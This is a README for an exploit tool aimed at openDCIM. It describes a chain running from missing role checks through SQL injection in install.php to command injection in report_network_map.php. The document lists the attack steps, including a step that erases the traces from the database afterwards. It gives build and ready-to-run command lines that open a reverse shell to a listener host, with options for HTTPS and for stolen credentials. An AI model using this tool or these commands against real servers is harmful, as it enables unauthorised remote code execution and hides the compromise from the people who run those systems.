openDCIM - SQLi to RCE via Config Poisoning

Remote code execution chain targeting openDCIM's install.php LDAP configuration form. Built on the VulnCheck go-exploit framework.

Vulnerability Chain

#	CVE	CWE	Description
1	CVE-2026-28515	CWE-862	install.php performs no role check before the LDAP config form - any user reaches it
2	CVE-2026-28516	CWE-89	Config::UpdateParameter() uses string interpolation, stacked queries via PDO+MySQL
3	CVE-2026-28517	CWE-78	report_network_map.php passes the dot config value directly to exec()

Affected: All versions (tested on latest commit 4467e9c4)

How It Works

1. POST to install.php - SQL injection via LDAP form backs up config, overwrites dot with a command payload
2. GET report_network_map.php - triggers exec(), confirms RCE via id output
3. POST to install.php - overwrites dot with reverse shell payload
4. GET report_network_map.php - triggers reverse shell
5. POST to install.php - restores all original config values from backup table

Zero traces left in the database after exploitation.

Build

go build -o opendcim-exploit .

Usage

Docker deployments (unauthenticated)

# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

htpasswd deployments (any valid user)

./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Flags

Flag	Default	Description
-rhost		Target host
-rport	80	Target port
-ssl	false	Use HTTPS
-lhost		Listener host (for reverse shell)
-lport		Listener port (for reverse shell)
-c2		C2 type: SimpleShellServer or SSLShellServer
-username		HTTP Basic Auth username (omit for SetEnv deployments)
-password		HTTP Basic Auth password (omit for SetEnv deployments)
-a		Asset detection (check if target is exploitable)
-e		Exploit mode